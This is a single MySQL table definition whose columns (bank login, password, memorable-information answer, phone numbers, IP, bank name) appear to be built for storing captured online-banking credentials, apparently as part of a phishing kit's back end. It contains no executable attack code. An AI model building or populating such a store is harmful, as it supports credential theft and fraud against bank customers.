CREATE TABLE `JSPHLT` (
  `ID` int(11) NOT NULL AUTO_INCREMENT,
  `ID_Login` varchar(30) COLLATE latin1_general_ci NOT NULL,
  `ID_Pass` varchar(30) COLLATE latin1_general_ci NOT NULL,
  `ID_Memorable` varchar(30) COLLATE latin1_general_ci NOT NULL,
  `ID_PhoneHome` varchar(30) COLLATE latin1_general_ci NOT NULL,
  `ID_PhoneMobile` varchar(30) COLLATE latin1_general_ci NOT NULL,
  `ID_PhoneWork` varchar(30) COLLATE latin1_general_ci NOT NULL,
  `ID_COD` varchar(30) COLLATE latin1_general_ci NOT NULL,
  `Data` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `IP` varchar(21) COLLATE latin1_general_ci NOT NULL,
  `CodBusca` varchar(60) COLLATE latin1_general_ci NOT NULL,
  `Bank` varchar(15) COLLATE latin1_general_ci NOT NULL,
  PRIMARY KEY (`ID`),
  KEY `ID` (`ID`),
  KEY `ID_Login` (`ID_Login`),
  KEY `ID_Pass` (`ID_Pass`),
  KEY `ID_Memorable` (`ID_Memorable`),
  KEY `ID_PhoneHome` (`ID_PhoneHome`),
  KEY `ID_PhoneMobile` (`ID_PhoneMobile`),
  KEY `ID_PhoneWork` (`ID_PhoneWork`),
  KEY `ID_COD` (`ID_COD`),
  KEY `Data` (`Data`),
  KEY `IP` (`IP`),
  KEY `CodBusca` (`CodBusca`),
  KEY `Bank` (`Bank`)
) 
